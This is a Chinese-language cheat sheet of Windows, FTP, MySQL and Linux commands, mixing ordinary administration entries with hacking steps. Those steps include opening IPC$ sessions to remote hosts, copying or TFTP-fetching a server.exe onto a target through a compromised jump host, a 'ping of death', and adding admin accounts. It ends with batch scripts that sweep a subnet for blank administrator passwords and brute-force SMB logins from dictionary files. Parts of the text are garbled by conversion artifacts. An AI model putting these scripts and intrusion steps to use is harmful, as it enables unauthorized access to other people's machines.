DOS命令具體解釋
net use $">\\ip\ipc$Content$nbsp;"password" /user:"username" 建立IPC非空鏈接
net use h: $">\\ip\c$Content$nbsp;"password" /user:"username" 直接登陸後映射對方C:到本地為H:
net use h: $">\\ip\c$Content$nbsp;登陸後映射對方C:到本地為H:
net use $">\\ip\ipc$Content$nbsp;/del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user username password /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators username /add 把“用戶”加入到管理員中使其具有管理員權限,註意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet。 net start schedule)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地局域網內開啟了哪些共享
net view \\ip 查看對方局域網內開啟了哪些共享
net config 顯示系統網絡設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 局域網內正在使用的網絡連接類型和信息
net share 查看本地開啟的共享
net share ipc$Content$nbsp;開啟ipc$共享
net share ipc$Content$nbsp;/del 刪除ipc$共享
net share c$Content$nbsp;/del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將password改為12345
net password 密碼 更改系統登錄password
netstat -a 查看開啟了哪些port,經常使用netstat -an
netstat -n 查看port的網絡連接情況。經常使用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的全部協議使用情況
nbtstat -A ip 對方136到139當中一個port開了的話,就可查看對方近期登陸的username(03前的為username)-註意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:“-w數字”用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”。“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示所有配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝文件夾的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具。默認是沒有安裝的,在安裝文件夾的Support/tools文件夾內)
del -F 文件名稱 加-F參數後就可刪除僅僅讀文件,/AR、/AH、/AS、/AA分別表示刪除僅僅讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除僅僅讀、隱藏、系統、存檔以外的文件。比如“DEL/AR *.*”表示刪除當前文件夾下全部僅僅讀文件,“DEL/A-S *.*”表示刪除當前文件夾下除系統文件以外的全部文件
del /S /Q 文件夾 或用:rmdir /s /Q 文件夾 /S刪除文件夾及文件夾下的全部子文件夾和文件。同一時候使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用同樣)
move 盤符\路徑\要移動的文件名稱 存放移動文件的路徑\移動後文件名稱 移動文件,用參數/y將取消確認移動文件夾存在同樣文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對照二個文件並把不同之處輸出到3st.txt文件裏。"> "和"> >" 是重定向命令
at id號 開啟已註冊的某個計劃任務
at /delete 停止全部計劃任務。用參數/yes則不須要確認就直接停止
at id號 /delete 停止某個已註冊的計劃任務
at 查看全部的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間執行對方某程序並又一次啟動計算機
finger username @host 查看近期有哪些用戶登陸
telnet ip port 遠和登陸server,默認port為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑\文件名稱1 路徑\文件名稱2 /y 拷貝文件1到指定的文件夾為文件2,用參數/y就同一時候取消確認你要改寫一份現存文件夾文件
copy c:\srv.exe $">\\ip\admin$Content$nbsp;復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件(全部文件)至本地C:
xcopy 要復制的文件或文件夾樹 目標地址\文件夾名 拷貝文件和文件夾樹,用參數/Y將不提示覆蓋同樣文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將“IP”的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送。如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後。上傳本地c:\server.exe至主機
ftp ip port 用於上傳文件至server或進行文件操作,默認port為21。
bin指用二進制方式傳送(可運行文件進);默覺得ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask。網關地址Gateway addres,接口地址Interface
arp 查看和處理ARP緩存。ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出所有信息
start 程序名或命令 /max 或/min 新開一個新窗體並最大化(最小化)執行某程序或命令
mem 查看cpu使用情況
attrib 文件名稱(文件夾名) 查看某文件(文件夾)的屬性
attrib 文件名稱 -A -R -S -H 或 +A +R +S +H 去掉(加入)某文件的 存檔,僅僅讀,系統,隱藏 屬性;用+則是加入為某屬性
dir 查看文件。參數:/Q顯示文件及文件夾屬系統哪個用戶,/T:C顯示文件創建時間。/T:A顯示文件上次被訪問時間,/T:W上次被改動時間
date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將僅僅顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變量名稱=要指派給變量的字符 環境變量設置
set 顯示當前全部的環境變量
set p(或其他字符) 顯示出當前以字符p(或其他字符)開頭的全部環境變量
pause 暫停批處理程序,並顯示出:請按隨意鍵繼續....
if 在批處理程序中運行條件處理(很多其它說明見if命令及變量)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭。比如:“:start”標簽)
call 路徑\批處理文件名稱 從批處理程序中調用還有一個批處理程序 (很多其它說明見call /?)
for 對一組文件裏的每個文件運行某個特定命令(很多其它說明見for命令及變量)
echo on或off 打開或關閉echo。僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件裏
findstr "Hello" aa.txt 在aa.txt文件裏尋找字符串hello
find 文件名稱 查找某文件
title 標題名字 更改CMD窗體標題名字
color 顏色值 設置cmd控制臺前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
print 文件名稱 打印文本文件
ver 在DOS窗體下顯示版本號信息
winver 彈出一個窗體顯示版本號信息(內存大小、系統版本號、補丁版本號、計算機名)
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 文件夾名 創建文件夾
replace 源文件 要替換文件的文件夾 替換文件
ren 原文件名稱 新文件名稱 重命名文件名稱
tree 以樹形結構顯示出文件夾,用參數-f 將列出第個文件夾中文件名
type 文件名稱 顯示文本文件的內容
more 文件名稱 逐屏顯示輸出文件
doskey 要鎖定的命令=字符
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行。又一次調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:
doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁盤D並顯示狀態報告。加參數/f並修復磁盤上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就能夠更改telnet服務默認port23為其他不論什麽port
exit 退出cmd.exe程序或眼下,用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可運行文件的文件名稱 為可運行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗體。參數:/eff、/en 關閉、開啟命令擴展。更我具體說明見cmd /?
regedit /s 註冊表文件名稱 導入註冊表。參數/S指安靜模式導入,無不論什麽提示;
regedit /e 註冊表文件名稱 導出註冊表
cacls 文件名稱 參數 顯示或改動文件訪問控制列表(ACL)——針對NTFS格式時。
參數:/D username:設定拒絕某用戶訪問;/P username:perm 替換指定用戶的訪問權限。/G username:perm 賦予指定用戶訪問權限。Perm 能夠是: N 無,R 讀取。 W 寫入。 C 更改(寫入)。F 全然控制。例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名稱 查看文件的訪問用戶權限列表
REM 文本內容 在批處理文件裏加入註解
netsh 查看或更改本地網絡配置情況
IIS服務命令:
iisreset /reboot 重新啟動win2k計算機(但有提示系統將重新啟動信息出現)
iisreset /start或stop 啟動(停止)全部Internet服務
iisreset /restart 停止然後又一次啟動全部Internet服務
iisreset /status 顯示全部Internet服務狀態
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的又一次啟動
iisreset /rebootonerror 當啟動、停止或又一次啟動Internet服務時,若錯誤發生將又一次開機
iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時。仍未停止Internet服務,若指定/rebootonerror參數。則電腦將會又一次開機。預設值為又一次啟動20秒,停止60秒,又一次開機0秒。
FTP 命令: (後面有具體說明內容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠程server的全部響應信息。
-d 使用調試方式。
-n 限制ftp的自己主動登錄,即不使用.netrc文件。
-g 取消全局文件名稱。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機文件夾
put 或 send 本地文件名稱 [上傳到主機上的文件名稱] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名稱] [下載到本地後的文件名稱] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機文件夾中的文件.假設有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(缺省值)
bin 或 image 設定以二進制方式傳送文件
bell 每完畢一次文件傳送,報警提示
cdup 返回上一級文件夾
close 中斷與遠程server的ftp會話(與open相應)
open host[port] 建立指定ftpserver連接,可指定連接端口
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立文件夾
rename [from] [to] 改變遠端主機中的文件名稱
rmdir directory-name 刪除遠端主機中的文件夾
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 又一次以別的username登錄遠端主機
open host [port] 又一次建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作文件夾,假設缺省,就轉到當前用戶的HOME文件夾
chmod 改變遠端主機的文件權限
case 當為ON時,用MGET命令拷貝的文件名稱到本地機器中,所有轉換為小寫字母
cd remote-dir 進入遠程主機文件夾
cdup 進入遠程主機文件夾的父文件夾
! 在本地機中運行交互shell,exit回到ftp環境,如!ls*.zip
MYSQL 命令:
mysql -h主機地址 -uusername -ppassword 連接MYSQL;假設剛安裝好MYSQL,超級用戶root是沒有password的。
(例:mysql -h110.110.110.110 -Uroot -P123456
註:u與root能夠不用加空格。其他也一樣)
exit 退出MYSQL
mysqladmin -uusername -p舊password password 新password 改動password
grant select on 數據庫.* to [email protected] identified by \"password\"; 添加新用戶。(註意:和上面不同,以下的由於是MYSQL環境中的命令。所以後面都帶一個分號作為命令結束符)
show databases; 顯示數據庫列表。
剛開始時才兩個數據庫:mysql和test。
mysql庫非常重要它裏面有MYSQL的系統信息。我們改password和新增用戶,實際上就是用這個庫進行操作。
use mysql。
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (字段設定列表); 建表
drop database 庫名;
drop table 表名。 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqldump --opt school>school.bbb 備份數據庫:(命令在DOS的\\mysql\\bin文件夾下運行);凝視:將數據庫school備份到school.bbb文件,school.bbb是一個文本文件。文件名稱任取,打開看看你會有新發現。
win2003系統下新增命令(有用部份):
shutdown /參數 關閉或重新啟動本地或遠程主機。
參數說明:/S 關閉主機,/R 重新啟動主機, /T 數字 設定延時的時間。範圍0~180秒之間, /A取消開機。/M //IP 指定的遠程主機。
例:shutdown /r /t 0 馬上重新啟動本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前執行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明:/M 列出當前進程載入的dll文件,/SVC 顯示出每一個進程相應的服務。無參數時就僅僅列出當前的進程。
Linux系統下基本命令: 要區分大寫和小寫
uname 顯示版本號信息(同win2K的 ver)
dir 顯示當前文件夾文件,ls -al 顯示包含隱藏文件(同win2K的 dir)
pwd 查詢當前所在的文件夾位置
cd cd ..回到上一層文件夾,註意cd 與..之間有空格。cd /返回到根文件夾。
cat 文件名稱 查看文件內容
cat >abc.txt 往abc.txt文件裏寫上內容。
more 文件名稱 以一頁一頁的方式顯示一個文本文件。
cp 拷貝文件
mv 移動文件
rm 文件名稱 刪除文件,rm -a 文件夾名刪除文件夾及子文件夾
mkdir 文件夾名 建立文件夾
rmdir 刪除子文件夾,文件夾內沒有文檔。
chmod 設定檔案或文件夾的存取權限
grep 在檔案中查找字符串
diff 檔案文件比較
find 檔案搜尋
date 如今的日期、時間
who 查詢眼下和你使用同一臺機器的人以及Login時間地點
w 查詢眼下上機者的具體資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改password
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通經常使用它來編譯C語言寫的文件
su 權限轉換為指定使用者
telnet IP telnet連接對方主機(同win2K)。當出現bash$時就說明連接成功。
ftp ftp連接上某server(同win2K)
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]
[drive1:][path1]filename 指定源文件。
[drive2:][path2] 指定要替換文件的
文件夾。
/A 把新文件增加目標文件夾。不能和
/S 或 /U 命令行開關搭配使用。
/P 替換文件或增加源文件之前會先提示您
進行確認。
/R 替換僅僅讀文件以及未受保護的
文件。
/S 替換目標文件夾中全部子文件夾的文件。
不能與 /A 命令選項
搭配使用。
/W 等您插入磁盤以後再執行。
/U 僅僅會替換或更新比源文件日期早的文件。
不能與 /A 命令行開關搭配使用。
附:批處理命令與變量
1:for命令及變量 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數。如:%i ,而指定一個變量則用:%%i 。而調用變量時用:%i% 。變量是區分大寫和小寫的(%i 不等於 %I)。
批處理每次能處理的變量從%0—%9共10個,當中%0默認給批處理文件名稱使用,%1默覺得使用此批處理時輸入的的第一個值。同理:%2—%9指輸入的第2-9個值;例:net use $">\\ip\ipc$Content$nbsp;pass /user:user 中ip為%1,pass為%2 ,user為%3
(set):指定一個或一組文件。可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一個"1"指起始值。第二個"1"指增長量,第三個"254"指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1}
command:指定對第個文件運行的命令,如:net use命令。如要運行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關
IN (set):指在(set)中取值;DO command :指運行command
參數:/L 指用增量形式{(set)為增量形式時};/F 指從文件裏不斷取值。直到取完為止{(set)為文件時,如(d:\pass.txt)時}。
使用方法舉例:
@echo off
echo 使用方法格式:test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完畢" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administratorpassword為空的IPC$連接,假設成功就把該IP存在test.txt中。
/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G 為變量(ip的最後一位);& 用來隔開echo 和net use 這二個命令。| 指建立了ipc$後,在結果中用find查看是否有"命令成功完畢"信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 使用方法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典文件d:\pass.dic來暴解d:\user.dic中的用戶password,直到文件裏值取完為止。
%%i為username;%1為輸入的IP地址(默認)。
DOS命令具體解釋